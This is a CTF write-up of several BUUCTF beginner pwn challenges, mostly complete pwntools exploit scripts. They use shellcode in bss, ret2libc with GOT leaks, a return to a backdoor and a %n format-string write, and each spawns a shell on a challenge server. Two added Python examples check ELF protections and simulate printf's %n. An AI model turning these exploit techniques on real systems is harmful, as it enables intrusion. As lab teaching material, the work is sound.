[CTF/Pwn] BUU Beginner Pwn Collection 2
x1n
2022-04-13 / 1 comment / 11 views

ciscn_2019_n_5

image-20220410102335780.png

The bss is controllable and the stack overflow is obvious: ret2libc.

image-20220410102825122.png

There really is... nothing at all here. Shellcode written straight in should run, so this is good practice at placing shellcode.

from pwn import *
# from LibcSearcher import *
context(arch = 'amd64', os = 'linux', terminal = '/bin/bash', log_level = 'debug')
def debug(p):
    gdb.attach(p)
    pause()
# elf = ELF('')
r = remote('node4.buuoj.cn', 27600)
# r = process("./elf1")
name_addr = 0x601080                 # bss buffer that receives "name"; with NX off, code placed there can run
r.recvuntil('name\n')
r.sendline(asm(shellcraft.sh()))     # stage the shellcode in the bss buffer first
r.recvuntil('me?\n')
payload = b'A' * 0x28 + p64(name_addr)   # 0x28 bytes up to the saved return address, then jump to the shellcode
r.sendline(payload)
r.interactive()

others_shellcode

image-20220410103803478.png

? What is this... just nc in and you get a shell.

ciscn_2019_ne_5

A menu challenge; both scanf calls are length-limited.
image-20220410104413135.png

Here src can be up to 128 bytes but dst is only 64, which is plenty: leak libc, return to main, then ret2libc.

image-20220410111614767.png

When trying to leak the puts address I found the payload happened to contain a 0x20 byte (a space), which scanf cannot read in. Tried switching functions, found that system is present, so we try to write into the data segment directly.

Help... scanf's address contains a \x00 as well.

In the end someone pointed out: the binary contains an "sh" string, which works just like "/bin/sh". But neither strings nor IDA recognizes a string that short.

from pwn import *
from LibcSearcher import *
context(arch = 'i386', os = 'linux', terminal = '/bin/bash', log_level = 'debug')   # 32-bit binary (p32, 0x0804xxxx addresses)
def debug(p):
    gdb.attach(p)
    pause()
elf = ELF('./elf3')
sys_addr = elf.sym['system']    # system is imported by the binary, so this address is usable as a return target directly
r = remote('node4.buuoj.cn', 29750)
# r = process("./elf3")
sh_addr = 0x080482ea            # the two-byte "sh" string in the binary; strings/IDA miss it because it is so short
def sendLog(payload):
    r.recvuntil('password:')
    r.sendline('administrator')
    r.recvuntil('0.Exit\n:')
    r.sendline('1')               # 1 = add a log entry (fills the 128-byte src)
    r.sendlineafter('info:', payload)
def transLog():
    r.recvuntil('0.Exit\n:')
    r.sendline('4')               # 4 = copy src into the 64-byte dst, triggering the overflow
# 0x4C bytes up to the saved return address, then system(), a dummy return address, and "sh" as the argument
sendLog(b'A' * 0x4C + p32(sys_addr) + p32(0) + p32(sh_addr))
transLog()
r.interactive()

铁人三项(第五赛区)_2018_rop

image-20220411134032542.png

No canary, stack overflow, ret2libc, 32-bit.
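
The "no canary, no NX, 32-bit" triage that opens each of these challenges can be automated. The following is an added example, not code from the original post: a dependency-free checker that reads the ELF header and program headers for NX (PT_GNU_STACK), PIE (ET_DYN) and RELRO (PT_GNU_RELRO), and uses a byte search for the __stack_chk_fail import name as a canary heuristic. The build_sample_elf helper constructs header-only test images (not loadable binaries) so the script runs without any of the challenge files; point it at a real binary by passing the path as the first argument.

```python
from __future__ import annotations
import struct
import sys

# Values from the ELF specification / Linux ABI
PT_GNU_STACK = 0x6474E551   # program header that declares the stack's permissions
PT_GNU_RELRO = 0x6474E552   # region made read-only after relocation
PF_X, PF_W, PF_R = 0x1, 0x2, 0x4
ET_EXEC, ET_DYN = 2, 3
CANARY_MARKER = b"__stack_chk_fail\0"   # import name present when the binary was built with -fstack-protector


def parse_protections(data: bytes) -> dict:
    """Read NX / PIE / RELRO from the ELF headers and look for the stack-protector import."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    ei_class = data[4]                       # 1 = ELF32, 2 = ELF64
    endian = "<" if data[5] == 1 else ">"    # EI_DATA: 1 = little-endian
    e_type = struct.unpack_from(endian + "H", data, 16)[0]
    if ei_class == 1:
        e_phoff = struct.unpack_from(endian + "I", data, 28)[0]
        e_phentsize, e_phnum = struct.unpack_from(endian + "HH", data, 42)
        phdr_fmt, flags_field = endian + "IIIIIIII", 6   # Elf32_Phdr: p_flags is the 7th field
    elif ei_class == 2:
        e_phoff = struct.unpack_from(endian + "Q", data, 32)[0]
        e_phentsize, e_phnum = struct.unpack_from(endian + "HH", data, 54)
        phdr_fmt, flags_field = endian + "IIQQQQQQ", 1   # Elf64_Phdr: p_flags directly follows p_type
    else:
        raise ValueError("unknown ELF class %d" % ei_class)

    # Without a PT_GNU_STACK header the x86 kernel falls back to an executable stack, so start from "NX off"
    nx, relro = False, False
    for i in range(e_phnum):
        fields = struct.unpack_from(phdr_fmt, data, e_phoff + i * e_phentsize)
        p_type, p_flags = fields[0], fields[flags_field]
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            relro = True
    return {
        "bits": 32 if ei_class == 1 else 64,
        "nx": nx,
        "pie": e_type == ET_DYN,           # ET_DYN main executables are loaded at a random base
        "relro": relro,                    # PT_GNU_RELRO present (full vs. partial needs the dynamic section, not checked)
        "canary": CANARY_MARKER in data,   # heuristic: the import name appears in the string tables
    }


def build_sample_elf(bits: int = 64, nx: bool = True, pie: bool = False,
                     relro: bool = True, canary: bool = False) -> bytes:
    """Constructed test input: an ELF header plus program headers only, not a loadable binary."""
    phdrs = [(PT_GNU_STACK, PF_R | PF_W | (0 if nx else PF_X))]
    if relro:
        phdrs.append((PT_GNU_RELRO, PF_R))
    e_type = ET_DYN if pie else ET_EXEC
    if bits == 64:
        ehsize, phentsize = 64, 56
        ident = b"\x7fELF" + bytes([2, 1, 1]) + b"\0" * 9
        header = ident + struct.pack("<HHIQQQIHHHHHH", e_type, 0x3E, 1, 0,
                                     ehsize, 0, 0, ehsize, phentsize, len(phdrs), 0, 0, 0)
        body = b"".join(struct.pack("<IIQQQQQQ", t, f, 0, 0, 0, 0, 0, 0x10) for t, f in phdrs)
    else:
        ehsize, phentsize = 52, 32
        ident = b"\x7fELF" + bytes([1, 1, 1]) + b"\0" * 9
        header = ident + struct.pack("<HHIIIIIHHHHHH", e_type, 0x03, 1, 0,
                                     ehsize, 0, 0, ehsize, phentsize, len(phdrs), 0, 0, 0)
        body = b"".join(struct.pack("<IIIIIIII", t, 0, 0, 0, 0, 0, f, 0x10) for t, f in phdrs)
    return header + body + (CANARY_MARKER if canary else b"")


def report(data: bytes) -> str:
    p = parse_protections(data)
    return "%d-bit  NX:%s  PIE:%s  RELRO:%s  Canary:%s" % (
        p["bits"], *("on" if p[k] else "off" for k in ("nx", "pie", "relro", "canary")))


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as f:
            print(report(f.read()))
    else:
        # constructed image shaped like a typical beginner target: 32-bit, executable stack, no PIE
        print(report(build_sample_elf(32, nx=False, pie=False, relro=False)))
```

The canary check is deliberately a heuristic: a binary that merely embeds the string would be reported as protected, and a statically linked one that inlines the check would not. For a definitive answer, walk the dynamic symbol table instead.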

from pwn import *
from LibcSearcher import *
context(arch = 'i386', os = 'linux', terminal = '/bin/bash', log_level = 'debug')   # 32-bit binary
def debug(p):
    gdb.attach(p)
    pause()
elf = ELF('./elf5')
main_addr = elf.sym['main']
write_plt = elf.plt['write']
write_got = elf.got['write']
r = remote('node4.buuoj.cn', 25135)
# r = process("./elf5")
# Stage 1: write(1, write_got, 8) leaks write's libc address, then return to main to reach the overflow again
payload = b'A' * 0x8C + p32(write_plt) + p32(main_addr) + \
    p32(1) + p32(write_got) + p32(8)
r.sendline(payload)
write_addr = u32(r.recv(4))
libc = LibcSearcher('write', write_addr)
libc_base = write_addr - libc.dump('write')    # leaked address minus the symbol's offset gives the libc base
sys_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
# Stage 2: system("/bin/sh") with a dummy return address in between
payload = b'A' * 0x8C + p32(sys_addr) + p32(0) + p32(binsh_addr)
r.sendline(payload)
r.interactive()

bjdctf_2020_babyrop

64-bit ROP.

image-20220411135702235.png

This... really has nothing worth saying.

from pwn import *
from LibcSearcher import *
context.log_level = "debug"
# r = process("./elf6")
r = remote('node4.buuoj.cn', 29721)
elf = ELF("./elf6")

puts_plt = elf.plt['puts']
vuln_addr = elf.symbols['vuln']    # return to vuln (not main) to reach the overflow a second time
puts_got = elf.got['puts']
pop_rdi = 0x400733    # pop rdi ; ret
ret = 0x4004c9        # lone ret, used to realign the stack before calling system
r.recvuntil('story!\n')
# Stage 1: puts(puts_got) leaks puts' libc address, then return to vuln
payload = b'A' * 0x28 + \
    p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(vuln_addr)
r.sendline(payload)
puts_addr = u64(r.recvuntil('\n')[:-1].ljust(8, b'\0'))   # puts prints 6 address bytes; pad to 8 for u64

log.info("puts_addr : " + hex(puts_addr))

libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
sys_addr = libc_base + libc.dump('system')
bin_sh = libc_base + libc.dump('str_bin_sh')

# Stage 2: system("/bin/sh"); the extra ret keeps rsp 16-byte aligned so system's movaps does not fault
payload = b'A' * 0x28 + \
    p64(ret) + p64(pop_rdi) + p64(bin_sh) + p64(sys_addr)
r.sendline(payload)

r.interactive()

image-20220411140506247.png

This is too obvious; we just pass in a negative number.

image-20220411140540180

There is a ready-made backdoor, so ROP straight to it.

from pwn import *
# from LibcSearcher import *
context(arch = 'amd64', os = 'linux', terminal = '/bin/bash', log_level = 'debug')
def debug(p):
    gdb.attach(p)
    pause()
# elf = ELF('')
r = remote('node4.buuoj.cn', 29042)
backdoor_addr = 0x400726    # the ready-made backdoor function in the binary
# r = process("./elf7")
r.recvuntil('name:\n')
r.sendline('-1')            # the length check does not reject negative values, so the read is effectively unbounded
r.recvline()
payload = b'A' * 0x18 + p64(backdoor_addr)   # 0x18 bytes up to the saved return address
r.sendline(payload)
r.interactive()

jarvisoj_fm

image-20220411141655928

There is a canary, and we need to change a bss value from 3 to 4 using a format-string vulnerability. Two steps: first find where the input string sits on the stack, then use %n to change the number.

image-20220411142450278

It is the 11th argument. Since x has to become 4, writing the 4-byte address first and %11$n after it does the job exactly: the four address bytes already printed are the value %n stores.
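
To make the "bytes printed so far become the written value" mechanism concrete, here is an added example (not code from the original post) that models a 32-bit printf in Python: it parses directives including the positional %N$ form, keeps the output byte count, and lets %n store that count into a dictionary standing in for memory. X_ADDR is the page's value; the stack layout that puts the user buffer in variadic slot 11 is constructed to match what the write-up found with its offset probe. A small reads_or_writes_stack check shows the defensive side: input that would read positional arguments or perform a %n write can be flagged before it is ever passed as a format string (the real fix being printf("%s", buf)).

```python
from __future__ import annotations
import re
import struct

# printf directive: optional "N$" position, flags, width, precision, conversion (%s omitted to keep the model small)
DIRECTIVE = re.compile(r"%(?:(\d+)\$)?([-+ 0#]*)(\d*)(?:\.(\d+))?([diuxXcpn%])")
MASK32 = 0xFFFFFFFF


def simulate_printf(fmt: bytes, args: list[int], memory: dict[int, int]) -> tuple[bytes, int]:
    """Render fmt like a 32-bit printf. args[i] stands in for the (i+1)-th variadic argument,
    i.e. the i-th stack slot above the format pointer; %n stores the byte count so far at memory[arg]."""
    text = fmt.decode("latin-1")     # 1:1 byte mapping keeps match offsets equal to byte offsets
    out = bytearray()
    pos = 0
    next_arg = 0
    for m in DIRECTIVE.finditer(text):
        out += fmt[pos:m.start()]
        pos = m.end()
        index, flags, width, _prec, conv = m.groups()
        if conv == "%":
            out += b"%"
            continue
        slot = int(index) - 1 if index else next_arg
        if index is None:
            next_arg += 1
        if not 0 <= slot < len(args):
            raise IndexError("directive %r reads stack slot %d outside the %d supplied"
                             % (m.group(0), slot + 1, len(args)))
        arg = args[slot] & MASK32
        if conv == "n":
            memory[arg] = len(out) & MASK32   # the written value is simply how many bytes were output before %n
            continue
        if conv in "di":
            s = str(arg - (1 << 32) if arg & 0x80000000 else arg)
        elif conv == "u":
            s = str(arg)
        elif conv in "xX":
            s = format(arg, conv)
        elif conv == "p":
            s = "0x%x" % arg
        else:                              # "c"
            s = chr(arg & 0xFF)
        if width:
            pad = "0" if ("0" in flags and "-" not in flags and conv != "c") else " "
            s = s.ljust(int(width)) if "-" in flags else s.rjust(int(width), pad)
        out += s.encode("latin-1")
    out += fmt[pos:]
    return bytes(out), len(out)


def reads_or_writes_stack(data: bytes) -> bool:
    """Defensive check: flag input that would act as a %n write or a positional stack read
    if it ever reached printf as the format string."""
    return any(m.group(5) == "n" or m.group(1) is not None
               for m in DIRECTIVE.finditer(data.decode("latin-1")))


X_ADDR = 0x804A02C   # bss address of x from the jarvisoj_fm write-up


def demo_jarvisoj_fm() -> int:
    """Replays the page's payload against a constructed stack where the input buffer is the 11th
    variadic argument, as the write-up found, and returns the value x ends up with."""
    payload = struct.pack("<I", X_ADDR) + b"%11$n"
    stack = [0xDEADBEEF] * 10 + list(struct.unpack("<I", payload[:4]))   # slots 1-10 are filler (constructed)
    memory = {X_ADDR: 3}
    simulate_printf(payload, stack, memory)
    return memory[X_ADDR]    # 4: exactly the four address bytes printed before %n


if __name__ == "__main__":
    print("x after printf:", demo_jarvisoj_fm())
    print(simulate_printf(b"%08x|%3$d|%%", [1, 2, 0xFFFFFFFF], {}))
    print("suspicious input:", reads_or_writes_stack(b"%11$n"))
```

Running the demo shows x going from 3 to 4 without any value ever being "sent" to it; the count of output bytes is the only thing %n knows about, which is why the address must come before the directive in the buffer.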

from pwn import *
# from LibcSearcher import *
context(arch = 'i386', os = 'linux', terminal = '/bin/bash', log_level = 'debug')   # 32-bit binary
def debug(p):
    gdb.attach(p)
    pause()
# elf = ELF('')
r = remote('node4.buuoj.cn', 28983)
# r = process("./elf8")
x_addr = 0x804A02C    # bss variable x, currently 3, must become 4
# The 4 address bytes are printed first, so %n stores 4; the buffer is printf's 11th variadic argument
payload = p32(x_addr) + b'%11$n'
r.sendline(payload)
r.interactive()

pwn2_sctf_2016

image-20220411142908663

Same as before: the hand-written get function's second parameter is unsigned, so we just throw in a negative number.

An int 0x80 is provided, but a straight ret2libc is simpler. printf is the only output function available for the leak.

from pwn import *
from LibcSearcher import *
context(arch = 'i386', os = 'linux', terminal = '/bin/bash', log_level = 'debug')
def debug(p):
    gdb.attach(p)
    pause()
elf = ELF('./elf9')
r = remote('node4.buuoj.cn', 27333)
vuln_addr = elf.sym['vuln']      # return here to reach the overflow a second time
printf_plt = elf.plt['printf']
printf_got = elf.got['printf']
fmt_addr = 0x80486F8             # a format string already in the binary (presumably the "You said: %s" one), reused to print the GOT entry
# r = process("./elf9")
r.recvuntil('read? ')
r.sendline('-1')                 # negative length is treated as unsigned by get_n, so the read is unbounded
# Stage 1: printf(fmt, printf_got) leaks printf's libc address, then return to vuln
payload = b'A' * 0x30 + \
    p32(printf_plt) + p32(vuln_addr) + p32(fmt_addr) + p32(printf_got)
r.sendline(payload)
# r.recvuntil('data!\n')
r.recvuntil('You said: ')        # first echo: the program printing our own input
r.recvuntil('You said: ')        # second echo: the ROP-driven printf, followed by the GOT contents
printf_addr = u32(r.recv(4))
libc = LibcSearcher('printf', printf_addr)
libc_base = printf_addr - libc.dump('printf')
sys_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
r.sendline('-1')
# log.info(sys_addr)
# log.info(binsh_addr)
# Stage 2: system("/bin/sh"); vuln_addr as the return address keeps the program from dying abnormally afterwards
payload = b'A' * 0x30 + \
    p32(sys_addr) + p32(vuln_addr) + p32(binsh_addr)
r.sendline(payload)
r.interactive()

Works locally. Note that the program must not exit abnormally at the end (exit(-1) still counts as a normal exit), otherwise the output stays in the buffer and never gets printed.

Remotely it just would not work for some reason. Case closed: LibcSearcher could not find the libc; using the libc BUU provides fixes it.
